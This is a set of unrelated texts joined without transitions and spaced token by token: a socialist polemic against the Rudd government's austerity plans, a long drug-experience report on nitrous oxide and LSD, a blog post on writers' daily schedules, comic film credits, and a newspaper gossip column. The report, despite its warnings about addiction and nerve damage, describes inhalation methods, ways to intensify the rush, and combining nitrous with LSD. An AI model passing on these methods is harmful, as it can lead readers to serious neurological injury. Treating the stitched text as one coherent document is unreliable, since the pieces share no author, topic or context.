Last week , the think tank , Access Economics , gave an indication of what this commitment signifies .
“ The 2 percent rule , ” it noted , “ does n’t sound scary and has n’t lost any votes so far , yet it implies a straitjacket on federal spending in coming years .
You may be surprised to know that , after four and a half years , the cumulative impact of the 2 percent rule will be devastating .
It would , for example , be the equivalent cost savings from abolishing the Defence Department , or it would be the equivalent of the savings the government would make from lifting the wage pension not to 67 but to 107 . ”
The Labor government ’s program not only involves savage budget cuts .
Rudd ’s essay makes clear that it intends going much further , to restructure economic and social relations in the name of building “ the foundations of sustainable growth ” .
According to Rudd , the crisis reveals that the limits of a “ purely debt - fuelled growth strategy ” have been reached and the world must now be “ rebalanced ” under conditions where “ many Western economies simply consumed too much . ”
Australia is clearly in the latter category .
Growth can no longer be based on supplying coal and iron ore to Chinese industry , which , in turn , exports to the debt - ridden US market .
The new program for growth involves a “ responsible agenda of future economic reform ” .
Those words will have a familiar and ominous ring for the many workers who experienced the Hawke - Keating governments , because it was under this banner that the Labor governments of 1983 - 1996 reduced real wages and organized an on - going offensive against jobs and working conditions .
Now , under conditions of the worst downturn since the Depression , these attacks will be deepened .
According to Rudd : “ Australia will need to work smarter and harder to achieve better national growth in a weaker global environment .
We need to implement a global competitiveness agenda for Australia that reinvigorates the drivers of productivity growth .
Our mission must be a more globally competitive Australia capable of securing a greater slice of what may well be a more sluggish global economy . ”
The implications are clear .
With every other government seeking to defend the profits and economic interests of its “ own ” corporations in the same way , workers are to be pitted against each other in a never - ending conflict , under conditions where the world economy is either stagnant or contracting .
Rudd goes on to emphasise that even as the Australian economy grows , the conditions of workers must worsen .
“ Australia ’s future prosperity , ” he insists , “ will rely on our willingness to make tough decisions , to tighten our belt as the economy recovers [ emphasis added ] and to build our global competitiveness . ”
Insisting that the key to economic growth is higher productivity , the prime minister cites the economic impetus that resulted from the Hawke - Keating measures .
But the growth in output resulting from higher productivity during the Hawke - Keating years and subsequently did not raise living standards .
Rather , as the historic decline in the wage share of national income reveals , it increased corporate and financial profits and deepened social inequality .
While “ egalitarian Australia ” has always been a myth , there was at least a limited movement towards greater social equality for most of the 20th century .
After 1981 , however , and the program of “ structural reform ” , the trend was reversed .
In the decade 1986 - 96 , the average real income of the bottom 40 per cent of households fell by between $ 13 and $ 98 per week .
By the end of the 1990s , the top 20 percent were earning nearly 50 percent of the total income — that is , nearly the same amount as the bottom 80 percent .
Over the period 1986 - 96 , the wealth of the top 200 families climbed from $ 7.3 billion to $ 37.3 billion .
In 1992 the pay of an executive in a top 50 company was 27 times that of the average worker .
By 2002 it had risen to 98 times .
Among the measures cited by Rudd as necessary to boost productivity is tax reform .
His proposal encapsulates the class character of his entire agenda .
Rudd writes : “ We need to ensure our tax system remains internationally competitive .
As a capital importing country , we need to be mindful of the impact domestic tax laws have on global investment decisions and our ability to attract investment and international business .
This is a key focus of the tax review , which aims to report at the end of the year . ”
Ensuring that the tax system remains “ internationally competitive ” means that corporations will receive tax cuts and concessions , which will be paid for by further “ tough ” reductions in government spending , on top of those imposed to pay for the bailouts and stimulus packages .
Rudd maintains that economic crises contain a “ paradox of recovery ” because , as growth returns , “ the economic conditions facing many families will deteriorate . ”
Unemployment will continue to rise , even if growth returns , interest rates will increase , putting pressure on home - buyers , and commodity price rises will inflict “ higher food and petrol prices on many Australian working families . ”
In addition , “ the government strategy to return the budget to surplus will involve some painful and unpopular decisions that will affect many Australians . ”
The word “ paradox ” denotes the existence of a contradiction .
Its source can be readily identified : the conflict of opposed class interests .
With the collapse of the global regime of profit accumulation fueled by the development of financialization over the past two decades , a new regime must be set in place if the profit system is to be restabilized .
That is the meaning of “ recovery ” so far as the capitalist class is concerned .
It can only be secured through a complete “ restructuring ” of the economy — in Rudd ’s words “ one of the most significant changes in global and domestic policy settings Australians have experienced ” — namely , a reduction in living standards and the outright impoverishment of entire sections of the working class .
The conditions are being created for explosive social and political conflicts and Rudd concludes his essay by indicating how the Labor government will fight the coming war against the working class .
Drawing on all the reactionary traditions of Laborism , going right back to its championing of the racist White Australia policy , the Labor government will invoke the “ unity of the nation ” as it imposes the demands of the ruling elites .
“ Throughout this crisis , ” Rudd writes , “ part of Australia ’s success has been built on our capacity to come together as a nation — workers , employers , unions , small - business people and governments .
And that has been because we are all in this together ....
Australians will need to draw on that same unity of purpose as we face the challenges of recovery . ”
The political meaning of the invocation of nationalism is clear : those who oppose the government ’s measures and fight for the independent interests of the working class will be denounced as “ traitors ” and “ saboteurs ” , betraying the common good and therefore rightly subjected to the force of the state .
The Chifley Labor government used the troops to break the miners ’ strike in 1949 ; the Hawke - Keating government broke up unions and workers ’ shopfloor organizations and then used the air force to smash the airline pilots ’ strike in 1989 .
There can be little doubt that under the impact of the deepest crisis of capitalism since the 1930s , these kinds of measures and more will be employed by the Rudd government as soon as serious resistance to its policies emerges .
The working class can only meet and defeat this offensive if it makes a complete political break with the nationalist ideology that forms the core of Laborism and advances its own independent perspective , based on the principles of socialist internationalism .
Nationalism has proven to be a reactionary deadend .
In the Great Depression of the 1930s it led directly to World War 2 .
The consequences today will be no less disastrous .
There is no way forward for ordinary working people under the profit system — unless ever - declining living standards , attacks on democratic rights , growing unemployment , poverty - level wages and deteriorating social services are considered a “ solution ” .
The working class must defend all its immediate interests and advance its own solution to the crisis , based on the understanding that no answers can be found within the framework of the nation state and nothing less than a complete reorganization of the world economy is necessary .
The productive forces developed by the unified labour of the international working class can no longer remain subordinated to the interests of a tiny layer of financial and corporate elites .
The world economy must be reorganized on socialist foundations to meet the social needs of the vast majority not private profit .
This is the program advanced by the Socialist Equality Party to meet the class war agenda of the Rudd government .
Life - Changing Problems
Nitrous Oxide & LSD
Citation : The MerryPrankster .
" Life - Changing Problems : An Experience with Nitrous Oxide & LSD ( exp79725 ) " .
Erowid.org .
Aug 5 , 2009 .
erowid.org/exp/79725
DOSE :
repeated inhaled Nitrous Oxide ( gas ) repeated oral LSD ( blotter / tab )
BODY WEIGHT : 140 lb
I have quite probably taken more Nitrous ( at least in Whippit form ) than anyone else alive .
So I feel compelled to share with all of you - my experience .
Excessive Nirous
Oxide abuse can cause permanent irreversible brain damage .
I am Patient Zero , so please , everyone , read this all the way .
If I had been fortunate enough to read what I am about to write , 30 years ago , my life would be very , very different .
I could just post the facts , but if you will walk with me through my life , you need never run the risk of having what happened to me , happen to you .
If you are a serious Nitrous user , reading this could help save your life .
It 's going to be quite long - but it is important to me to paint the whole picture .
I also hope that it might prove entertaining - and some of you might recognize yourselves in the narrative - and those who feel a sympathy with my feelings - those who relate to my expression and understanding - those who think yes , Yes , YES !!
are the ones who need to read this the most - as you are in the greatest danger - or could be if you are not careful .
I am being honest about some stuff that I have hidden from others all my life - some of it is quite embarrassing - but I choose to share the humourous aspect with you all .
I can't be the * only * lunatic in the world .
This is * not* an anti-Nitrous post .
This is information that has only recently become available .
Personally I wish our atmosphere was Oxygen and Nitrous Oxide instead of Oxygen and Nitrogen .
So without further ado ... The tale begins in the dentists chair .
I was 9 years old .
I had never taken any drugs , and was not looking to at the time .
But I had a phobia about dental work , and the new dentist told me that he would give me ' laughing gas ' , and it would remove my fear .
So he attached the mask to my nose and told me to breathe normally .
After about 20 seconds I began to feel a tingle , quite pleasant , which was getting stronger with each passing second .
The dentist asked me if I could feel the gas yet - and a drug addict was born .
I told him ' No , I do n't feel anything ' , so he turned it up .
By now I was really starting to feel * amazing * - it was fantastic .
But it was more than just tingles and physical well being .
Even though I was only 9 , I started seeing patterns - in everything - a deeper connection - set of connections - a lattice that embraced reality , but which had a meaning - a message - beneath the surface - something * important * .
The dentist asked me once more if I felt the gas .
I told him that it was starting to take effect , but was not very strong - despite the fact that I could barely string the sentence together - as I wanted him to turn it up even more - which he did .
The last thing I remember hearing was the dentist saying to the nurse , ' This one likes to fly high ' .
From that moment , I knew that I had to obtain Nitrous Oxide again at some point .
I had imaginings of listening to music while feeling that way and how awesome it would be ( and I was right , of course ) .
It stuck there - in my memory - unforgettable - I was 9 - and I no longer saw the universe the way that I had before .
Jump ahead 11 years .
I 'm 20 , and I found acid about six months earlier .
I 'm in Amsterdam , having left South Africa to avoid military service .
I 'm a musician and making a living playing street music .
We 're on acid all the time , taking larger and larger doses each time .
It 's classic .
I 'm the messiah and I 'm going to save the world by turning everyone onto LSD .
I'm Ken Kesey , I'm Ram Dass , I 'm Neal Cassidy driving the bus to the next Acid Test .
I 'm on a mission .
I have found the ultimate truth , and I believe that I have the ability to express it .
It 's straight out of the Electric Kool - Aid Acid Test .
I am The Merry Prankster - doing ever increasing doses of LSD because I believe that there is a reality behind this one , and I am going to evolve and become a transformed being - a metamorphosized , evolutionised , mental telepathical Guru .
I even have a following .
There are 5 of us - and I am the leader .
I 'm the fucking chosen one .
This is why I am alive - this is why I exist - I am the new Messiah !@!
It 's funny looking back on it now - a bit embarrassing ( OK - a lot ) - and I have never told * anyone * about this before - like who would admit this shit - but it 's important to paint the whole picture .
But LSD is not a beast to be tamed .
Oh , I * believed * that I was in control of the acid - that * I* held the reigns .
I had become its master , and its servant .
But I was treating it disrespectfully - and when you do that , the Acid inevitable turns around and slaps you down a peg or two .
In my case it was all the way down from my lofty delusions of grandeur , to a smear on the roadside .
A new acid had come out - called simply ' Mandala ' ( Amsterdam 1981 ) .
The dealer told me that it was not ' commercial ' acid , a bit stronger .
And to boot , a * half * a hit was a whole .
I had been dropping between 5 and 10 at a time , and I did not assume that this half hit of new acid was going to top my multiple ingestions from the weeks before .
But I learned that day that what I had been taking was not truly LSD - but a pale shadow of what * real * LSD is .
All my research - all my dosing - nothing - had prepared me for what happened .
It was * phenomenal * acid - I had never seen such colours - and it warped dimensions that I did not recognise anything around me .
It was too much for downtown Amsterdam , so we all jumped on a tram , laughing uncontrollably all the way home .
Once home it was even stronger , having really kicked in .
I made a big hashish pipe and took a huge hit of really good Afgan hash .
And then I completely lost my mind .
I had to reconstruct it all afterward , with the help of my friends .
There was a huge flash - and reality had shattered - literally .
It was as though everything I had been seeing was made of glass - like a mirror , and the hashish exploded the acid so hard and fast , that I suffered a psychotic break .
More to the point - from one moment to the next I had total amnesia .
I was with my closest friends - a girl who had come over to Europe with me who was like my sister - I had known them all for years - but I recognized no - one .
And I did not know who I was - or where I was ( and I do n't mean which town - I mean which * Universe * ) .
I was a total blank - wiped clean - nothing left .
I realized that I was bleeding - in my throat - it had turned to glass - and shattered - blood was everywhere , and my life started slipping away - I collapsed slowly to the floor - and died .
However , a while later I appeared to be conscious .
SO this was it - I was dead .
This must then be the afterlife .
A man walked up to me and looked at me curiously - and then said ' Are you OK ? '
But what I heard was 'A R E Y O U O K A Y ' in a kind of deep Twilight Zone surrealism .
Who * was * this person .
If I was dead - perhaps he was me - a reflection of me - on the other side of the shattered mirror that was reality - so I said ' Who * are * you ? '
And he said to me ' You know who I am ' - which I heard in a big boomy voice as 'Y O U K N O W W H O I A M !!!'
The poor guy - he did n't have a clue what was going on - none of them had actually realized yet that I had quite literally lost my mind - all of it .
So I deduced that if he were me - a kind of ' afterlife ' version - that we would have the same mother as I - so in an attempt to confirm this I asked him ' who is your mother ' , to which he replied ' You know who my mother is ...' which I heard as .... OK - you get the picture .
I treated LSD as though it was something that I actually had control over - that I was bigger than Acid - that I was beyond a bad trip .
I will end this part of the tale of this day here , but know that it took the rest of the day to reconstruct my * basic * ego - just knowing who and where I was .
I still felt broken glass in my throat from where it had shattered when the ' mirror ' shattered .
I could no longer sing .
When I tried I was overwhelmed by an abject terror , and shut down .
It was weeks before I could sing again ( which I needed to do to survive ) - and I continued to have terrifying Flashbacks for the next 6 months .
This was the most phenomenally life - changing experience of my entire life .
I was afraid - afraid to do acid - I had been so humbled - so beaten - so kicked in the teeth - any ' normal ' person would have just said ' That 's it !
Never again !!'.
But I could not do that - live in fear the rest of my life , because i had experienced this overwhelming and incomprehensible annihilation of ego .
I had to face my fear .
I had to get back in the driver 's seat - I had to understand what had happened in order to be whole again .
And there was born a true and devout Acidhead - for life ( still going strong ) .
I needed to * understand * myself - how my brain worked - and LSD was the tool that had both damaged and which would repair me .
The experience kind of put a crimp in my plan to save the world , as I realized that it was * completely * unethical to turn anyone on unless they truly desired to be turned on .
It was a full year before in mid winter , Christmas time in Konstanz , Germany , that I did my next truly superb LSD - only this one was as soft as the other one had been hard - and finally - utterly high , I looked in the mirror and was no longer afraid .
I finally had all of my mind back - and my fear was gone ( but my respect has never faltered ) .
And now the long awaited return to the topic of Nitrous Oxide .
WHo would have thought - who would have guessed - that Nitrous Oxide - laughing gas - was used to make whipped cream .
I found out from a young freakzoid heroin junkie in germany - that ' whippits ' were Nitrous .
Finally !!
The 9 year old boy in me shouted in glee .
I knew it .
I knew I would find it again .
And this time I was going to really get to know it .
I remember buying the whipped cream machine , and a box of the cartriges - I remember my total excitement - my fear of disappointment - what if he was wrong ?
I wound in the first cartridge ( neglecting of course to add the cream ) .
I hyperventilated for a minute , breathed all the way out , and inhaled the entire contents .
Within 5 to 10 seconds I recognized the feeling - my insides screamed in glee - and for the next minute my world was perfect .
it was exactly as I had remembered it - only more so ( I have since figured out through much experience that the reason that breathing Nitrous Oxide through a whipped cream syphon is so much stronger than from a tank is because it is * compressed * in the machine .
It 's like taking Methamphetamine instead of plain old Amphetamine .
I also learned over time that I can load about 2 to 3 cartridges into the machine before breathing - and that the more compressed the gas , the more intense and powerful the rush ) .
This is my encapsulated life story , so I have to jump to pivotal moments if I am going to keep your attention .
Let 's just say that over the course of the next year I did * hundreds * of boxes of Nitrous - maybe a thousand .
And the more I explored the Nitrous reality the more sense it made - of everything .
I was starting to feel that I understood the intrinsic nature of the universe - not just in the sense of thoughts - but in perceptions - understandings .
There were times - and I am sure that most of you can relate - when I felt that for a moment I * truly * understood the universe - as it * really * was - and it was * so * simple - and funny - fucking hilarious !!
I would experience the moment and crack up laughing uncontrollably - because I understood the core of the essence of God - the universe - matter , gravity , light , energy , quanta .
But as we all know - the profundity of Nitrous is fleeting , and after the epiphony it fades so quickly that one can't quite remember what it was that one was thinking - and why it was so funny .
This , I found to be the curse of Nitrous - to have this understanding - so plain and simple - even expressible in mere words - if I could find them - or once found , if I could not lose them .
How , I wondered , can we extend this experience - make the come down slower so that it would be possible to bring back some of this universal intrinsic truth to the real world .
On a beautiful summers day of 1982 , I discovered the chemical synergy that I have affectionately referred to for the last 30 years as ' GASCID ' - as in Gas and Acid = Gascid .
And from that moment , my life changed almost as profoundly as the day I lost my mind - because it was the day that I found my answers - all of them .
I had done some acid - not a lot - maybe half a hit .
I was still very cautious , after my annihilation a year earlier , and the theory was twofold .
If I did Nitrous right at the end of an acid trip - like 8 hours into it - when everything had resolved on the Acidic level , perhaps a ) the Nitrous would boost the strength of the acid to give me a momentary high that was like 5 or 10 hits of * really * good acid - and b ) that perhaps the acid , would help to extend the duration of the Nitrous , and give me a little more time to try and bring back some of the deeper essence of the experience .
I was extremely careful .
I 'd lost my mind once already , and I was not keen on a second round .
My first hit was miniscule .
There was a very slight shift in my perceptions .
I took a little more and felt the Nitrous very vaguely , but in a way like never before - and in a good way like I had never imagined .
By the time I was on the last cartridge , I took the entire thing , and I experienced for the first time in my life , the Holy Realm that is Gascid .
The world that is Gascid is a story unto itself with so many facets .
I am not going to try and define any of the experiences right now - too much of a tangent .
I became a student of Gascid .
I had found what was - at least for me - * the* key that unlocks the doors to everything - and more importantly , it was the most exquisite experience that can be .
It is heaven to me - a perfect state of being - the thing that we all at the core wish to experience - even once .
I had found the key - a gateway - a wormhole to what has for me become not so much a drug synergy as an actual * place * .
I devoted my life to this ' faith ' of mine - and my quest was to bring back some of these truths , and to find a way to share them with others - which I did in fact accomplish .
I have kind of built an environment that almost * guarantees * arriving at this place .
There is technology involved - it 's all very complicated .
But this post is not about Gasid - it 's about Nitrous , and the risks .
Over the next 12 years , I did Gascid about 500 times ( and we 're talking full blown 4 hour experiences with like 10 boxes of Nitrous each time ) .
It is my world - my reality - my Guru - my god - and myself .
I have no doubts - no hesitation - no lack of understanding - and it just got better all the time , as I learned to ' pilot ' this space / time / ship that I built over the course of those 12 years .
I eventually left Europe and moved to Canada , got a new life and a new wife , and continued building and discovering .
It was very hard at times .
Terribly lonely .
From my perspective I had found * the* answer .
And what 's more is I could pretty much prove it .
And took a few select people on a trip around the universe .
But it was * so* lonely .
All I wanted to do was share what I had found .
But very few people knew about Nitrous back then .
I began to get adamant about finding proof - finding a way to bring back something significant enough that would * make * people take me seriously .
I knew that if I told this all to a shrink that I would be labelled a schizophrenic with delusions of grandeur .
But * I * knew that all a doubter had to do was come for a ride and see for himself .
They would find their own truth - not mine - everyone has their own truth .
All I had found was the medium in which to fairly reliably produce a very specific experience - and to be able to return and continue the thought - any time .
I was frustrated .
My wife was not too supportive of this - and I wanted her on my side , so I tried even harder to find some tangible evidence that the work that I was doing was valid - telepathy - psychokenesis - some small evolutionary step that would demonstrate that what I was doing was * valid* - and that I was not just another nutter who did too many psychedelics .
This was the time that I almost completed my space / time / ship .
It was an entire room , with a ' drivers seat ' positioned in the middle - there were spinning wheels and stroboscopic lights - all synchronized to music - my own of course which was writted specifically to induce certain types of trance using light and sound to guide the subject on a ' solid ' path .
I was so * close * - but relations were getting strained with my wife , who thought that I was obsessed .
She was right of course .
I was .
And why not ?
This was the most important thing in my life .
It was the one thing in which I truly had unshakable faith .
I * had * to find some evidence of the validity - I needed * support * on this - not criticism .
I at least deserved a chance to demonstrate it to someone else - to have the years that I had invested validated by another fearless soul who was willing to walk through the gates of heaven and be embraced lovingly by the universe .
And now we start to approach the moment of truth - the point - the reason that I have written everything that came before now .
I am a scientist - not just a druggie .
I do n't just * take * drugs - I study them .
I prepare myself , I am informed - I know the risks - I am * careful * .
But this was before the Internet .
The only knowledge that existed was in books - and almost no - one knew practically nothing about Nitrous .
It had just slipped by - owing to the fact that it was legal - and a secret known by not a lot of people back then .
According to Peter Staffords Psychedelic Encyclopedia at the time , Nitrous Oxide was a perfectly safe drug .
There were two , and only two dangers .
The first rule was - do n't breathe directly from a tank - you can freeze your lungs .
And the second rule was - do n't tie a mask to your face , because if you fall unconscious , you will eventually die from lack of oxygen .
That was it .
Other than that - it was safe - they give it to * kids * for fuck sake .
I do n't know exactly when it went from genuine psycho-scientific - spiritual research to addiction - but it was marked by the fact that I started doing Nitrous without doing acid .
I know myself - I 'm an obsessive raging fucking maniac when it comes to drugs .
I have no brakes .
So I made a deal with myself many years before ( after doing way too much Nitrous for way too long and having spent a small fortune on it ) that I would * only * do Nitrous if I had done acid .
I tried to keep it to once a month - but not always - I kept it at least to once a week .
But I was so intent on finding my ' proof ' - * quickly * - that I made an exception - just once .
then again . and again .
I really could n't afford it , and I knew my wife would be pissed at me for wasting money - so I kept it to myself .
After all , I was almost there .
12 years of exploration and design was finally going to come to fruition .
I almost understood it all - I was so close .
And the Nitrous would run out and I would go to the store and get more - and then be wracked with guilt over it .
And suddenly I realized that I was addicted to Nitrous Oxide .
They had said nothing about addiction in the books .
But I had been doing it every day for about 6 weeks , maybe more - and had been doing it excessively before it became daily .
And when it ran out I just could not cope .
This was not a drug withdrawal like an opiate - this was madness incarnate .
I could not * stand * being in my body - it was blindingly intense and would n't go away .
The next weeks are only a vague memory - with scattered images and vague recollections .
I could not afford to keep taking the Nitrous - but I could not survive stopping .
I wanted to call out for help - but who the fuck would I talk to .
There was no Internet - very few people knew about the recreational legality of Nitrous .
I felt so stupid - how do I even begin to explain to someone that I inhale the whipped cream charges - they 'd probably lock me up .
So I had to stretch the Nitrous I had - breathe very , very little in between , hold my breath for minutes at a time .
Not breathe - as much as possible .
I was losing it .
I knew that .
I was starting to go crazy - even by my own standards - and those of you who have actually read this far can probably understand that I am a rather bizarre individual .
I do n't remember much of the last weeks .
I felt like I was dying - slowly .
My thoughts were scrambled - there were ' dark patches ' in my consciousness .
At one point I thought I might have been possessed .
I had gone from what I considered to be a self - respecting scientist ( of the whackiest of varieties ) to a fucking loony .
I was lost .
I was doing a gig on Vancouver Island , sitting on the beach doing Nitrous all day long in tiny little gasps .
The first night I noticed that I had lost the feeling in the tips of my fingers on my right hand .
The next day , my left hand .
By he time I got home , my hands and feet were numb .
Two days later my entire body had no sensation , and I had completely lost my motor control .
Then I was in the hospital - and the year that followed never became cemented in memory .
People - Please pay attention - this is not a well - known fact .
Not a lot of people have screwed up quite as badly as I did - and it's never been made public in a big way .
The effect of Nitrous Oxide is * cumulative * .
If I remove the mental , and psychological , and emotional horror that followed , I 'll tell you that the physical sensations finally returned - as did my motor control .
But the problem is that I had damaged my brain - and the signals that should have just reported to my cerebellum that I was in fact alive and moving , were mistransleted by my brain as Pain signals .
In short - when my feeling returned , I was in unbearable pain - everywhere - non stop - every freaking day of my life for the last 14 years .
I nearly commited suicide so many times .
Not because of depression or sadness , but because I simply could not imagine waking up every day to * this * - suffering - and * nothing * to be done about it because it is not physical as such - it 's neuropathic pain - and it did not heal - and there is no treatment .
I have spent 14 years wishing to god that the internet had been around just a little earlier - because once it arrived I found another person who had done what I had done - and who had suffered identical damage .
I only found this * two * years after the fact .
I could describe my suffering over the last 14 years - but I hope that I have successfully illustrated my point through this post .
Nitrous is * amazing *.
Gascid is * everything * that I have said it is times a * million * .
There was nothing wrong with my perceptions - only my obsession , and total lack of self restraint .
I had my cake - and I was eating it - and I could have continued to be privvy to what I consider to be the best chemically induced experience that there is .
I found heaven - and I was such a glutton that I destroyed it through my greed .
I still believe * absolutely * in Nitrous - and particularly gascid .
It is simply the best .
Nothing is better - not even love .
I am almost done .
There are so many aspect of this story that I left out - because we 're talking 15 odd years - hundreds , maybe thousands of * cases * of Nitrous ( and about 750 hits of acid ) .
All I wanted to do was share it with someone else .
I have told only a handful of people about this - and I have never told the whole story at once .
If even one of you reading this , ran the risk of making my mistake - and if this post at some future point helps to prevent that eventuality from becoming a reality , then exposing myself in this way will have been worth it .
Please friends - be careful .
If you ever find Heaven - take care of it .
Monday Master Class : How to Schedule Your Writing Like a Professional Writer
October 15th , 2007 · 95 comments
[ UPDATE : 2/18/08 ]
Welcome new readers !
If this is your first time here , Study Hacks is a blog that focuses on hacks to help you do better at college ( and in life ) while spending less time .
If you like this article , you might also like related productivity posts on : accomplishing more by doing less , using a productivity - free day , implementing a Sunday ritual , and calculating your churn rate .
If you like what you see , consider subscribing to the blog ’s RSS feed .
The Pain of Writing
Students hate paper writing .
It ’s not the writing itself that ’s horrible , but instead , being forced to write when you do n’t want to .
Is there any worse feeling than staring at a half - completed term paper at 2 AM ?
The solution is simple .
Schedule your writing better .
But the specifics can be tricky .
What ’s the best way to schedule writing ?
Clear out a full day ?
Do it a little bit at a time ?
Work at night once you ’ve finished all of your other work ?
I could give you some answers that sound right , but ( for now ) forget about me .
Let ’s see what the pros have to say …
How Professional Writers Write
Professional writers spend most days of their adult lives writing .
For those among them who specialize on long form non-fiction , their writing is not that different from the types of research papers that plague college students .
Assuming that these writers do not want to spend most of the days of their adult lives hating what they are doing , it stands to reason that , over time , they have figured the least painful possible way to schedule a large amount of writing .
With this in mind , I dug up interviews with the following masters of long form non-fiction :
Ted Conover
Richard Ben Cramer ,
Jonathan Harr
Jon Krakauer
Michael Lewis
Susan Orlean
Richard Preston
Eric Schlosser
Gay Talese
Calvin Trillin .
I went through each interview extracting any discussions about the writer ’s habits .
I ’ve aggregated and analyzed this data to provide you with a snapshot of how professional writers schedule their writing .
At the end of this post I will discuss how to apply these observations to your own student writing assignments .
Notice this advice is applicable beyond just students .
Anyone who has to regularly churn out writing — be it a blogger or a part - time freelancer — can benefit from the habits of the pros .
When During the Day Do Professional Writers Write ?
Nine out of ten writers discussed when during the day they write .
All nine worked in the morning .
Four also worked during the afternoon .
Three worked during night .
Only one worked in all three times .
Several writers described the afternoon as a mental dead time useful only for exercising and , maybe , editing .
At What Time Do Professional Writers Start Writing ?
Five out of the ten writers provided a specific start time .
The latest was 8:30 am .
Four other writers who did n’t give a specific time said , in so many words , “ in the morning . ”
No writer described starting their work in the afternoon or evening .
Several did mention that they might also be efficient working very late at night ( and sleeping through the day ) , but that this seems incompatible with being a productive member of society .
Where Do Professional Writers Write ?
Six out of the ten writers answered this question .
All six described a silent , isolated location , free of distractions .
Specifically , they provided the following answers :
Office in the garage with no window
An old tenant farmer ’s house
A 9×9 cubicle in the basement
A small redwood cabin , 100 yards from the main house
A bare office
A home office with no phone or Internet
It should be noted , however , that the magazine writers among our sample admitted to being able to write in almost any environment — a trait learned from crashing deadlines on the road .
Jon Krakauer also mentioned that his dream was to write in the morning in an isolated cabin , and then spend the afternoon ’s climbing .
He is yet to realize this dream .
Observations …
The most striking observations from this study :
The writers work in the morning .
They often start very early in the morning .
Five out of ten of the writers described a little ritual before starting their morning writing .
A surprising number of these rituals focused on The New York Times .
The writers drink coffee .
Lots of coffee .
The writers write in isolation .
If they did n’t have families they would push this even farther .
Many discussed having no e-mail or phone in their workspace .
One purposefully used a “ shitty old laptop ” to avoid temptations like solitaire .
Gay Talese rigged his home office so it could only be entered through a separate outside door .
How to Apply this Advice
If you are a student — or an amateur writer or blogger — here are some simple rules for emulating the habits of the professionals :
Spread out work on an assignment over several days .
Coming at it fresh increases its quality .
During these days , get up early .
Probably earlier than you are used to .
Say , around 7 or 8 am .
( This means these days will be weekdays , probably early in the week so you can avoid temptations to party the night before ) .
Have a mini-ritual to jump start the day .
It should probably involve coffee .
Breakfast .
Maybe the morning paper .
Do n’t take too long .
Go to the most isolated place possible .
To get your mind ready to think , review the last pages you wrote .
Work for two or three hours .
Then stop .
Follow this habit regularly .
Do n’t write during other times .
Do n’t write in public places .
Do n’t start writing the day before .
Interestingly , without knowing it , I stumbled across many of these same scheduling habits during the fall of my senior year at Dartmouth .
At the time , I was balancing my normal student responsibilities with the writing of the manuscript for my first book .
The method I used : I got at 8 AM , every weekday morning , brewed a cup of coffee and wrote for 1.5 hours at my desk — all without leaving my room .
After I was done , my real day could begin .
It worked beautifully .
What writing habits work for you ?
What habits do you need to abandon ?
Related Posts
Crazy Credits
Alec would like to thank his parents for allowing him to watch alot of TV as a child .
Also , his beautiful wife and child for all of their love and support , and for coming all the way to Prague to stay for the duration of production , and for having the courage of conviction to know that was a terrible idea and to get the hell out 4 weeks later .
David would like to thank his parents despite the fact they still want him to go to medical school .
Also , thanks to everyone who came and visited in Prague - the roommates , the comic art guys , the girlfriend , Lampoon folk .
It was a crazy long flight , but the visits really helped .
Everyone who did n't visit can go to hell .
You know who you are .
And to Al , Billy and Jim , who taught me how to write .
Blame them .
Jeff would like to thank his parents for buying all the Cleveland Indians merchandise and for insisting that he thank them in writing .
And Alex for all the great music and everything else .
He would also like to thank Ted Griffin for watching over his house while he was in Prague , and would now kindly thank him to stop crapping in it daily .
The guys would like to thank every single person who worked on the film for helping us make the movie .
Also Amici Mei , Casa Blue , Alcohol Bar , the chicken salad at Scandals , and the brownies at Praha Bakeshop .
And that terrible 24 - hour Czech Burrito place .
Additional thanks to the Writers Guild and Directors Guild , for always being there for us .
And a very special thanks to Sandy Grushow and Lloyd Braun , without whom none of this would have been possible .
See more
Towering intellect
As the eighth anniversary of Sept. 11 looms , many wonder why the World Trade Center site still remains an empty lot , for the most part .
And many also blame politicians and public officials — from New York Gov. David Paterson ’s office to the Port Authority — for what appears to be a bureaucratic impasse .
“ The richest man in New York may not be collecting a salary , but it is not Mayor Bloomberg ’s money that is being squandered at Ground Zero .
How much longer will a handful of politicians be allowed to defy the will of millions of Americans ? ” asks structural engineer Kenneth Gardner of the Twin Towers Alliance .
The local group wants no mere skyscraper at the hallowed site .
They want their identical towers back and are using concepts suggested by Herbert Belton , now deceased , an architect on the original construction team .
“ A recent MSNBC poll suggests that more than 90 percent of the people agree that the Twin Towers belong in America ’s skyline .
Why are politicians catering to the tiny segment of the population that disagrees ? ” Mr. Gardner demands .
The “ Freedom Tower ” and surrounding structures that are currently planned wo n’t open until 2018 , according to a report from the Lower Manhattan Construction Command Center .
Numerous press accounts — including one from the New Republic ’s Deroy Murdoch — condemn the interagency squabbling and endless “ pending decisions . ”
They point out that the Empire State Building was built in just over 13 months .
Enough already , says Mr. Gardner , who maintains that “ Twin Towers II ” could be built at the site with existing funds — and within four years .
He has also launched a public petition to wrest lawmakers and public officials from their lethargy and proposed a series of “ Kitchen Table Summits ” to jump - start a new course .
“ This is not an effort to rebuild 40 - year - old buildings .
It is an elegant , once - in - a - lifetime chance to revive our city and nation by putting the people back in charge of their destiny , ” Mr. Gardner says .
Buy the way
Some Democrats have openly declared war on FOX News , calling the news channel “ the propaganda arm of the Republican Party ” and accusing FOX of “ outright hate - mongering and incitement of violence . ”
Democrats.com — an activist group that bills itself as “ the aggressive progressives ” — is calling on the public to boycott FOX News advertisers and citing news host Glenn Beck and Sean Hannity as the “ worst offenders . ”
So. Democrats .
Need insurance , house alarms , a suit , a Benz or some cheese ?
Is the mall beckoning ?
Among those on the new suggested no - no list : 60 Plus.org , AARP Insurance , ADT Security , Apple , Brita Filter , Conservatives for Patients Rights , Ditech , Healthy Choice , Men ’s Warehouse , Mercedes - Benz , Nexium , Pepboys , Radio Shack , Red Lobster , Sargento Cheese and the Wall Street Journal .
Quotes of note
“ America ’s Affordable Health Choices Act of 2009 ” — the official title of proposed heath care reform legislation before the House .
“ We can discuss these issues like civilized people .
At least that ’s what I tell my 6 - year - old . ” —
White House press secretary Robert Gibbs on the health care debate , to NBC .
“ Hillary : Still angry after all these years . ” — John Hinderaker , Powerlineblog.com
Days of yore
On this day in 1841 , President Tyler vetoed a second attempt by Congress to re-establish the Bank of the United States .
Angry supporters of the bank burned his effigy outside the White House .
Queen Victoria sent the first overseas telegraph to President Buchanan over a new trans -Atlantic cable 151 years ago today .
Now - and - then prospector George Carmack discovered gold in the Yukon ’s Klondike River on this day in 1896 .
Yes , he became a millionaire and retired to Vancouver , British Columbia .
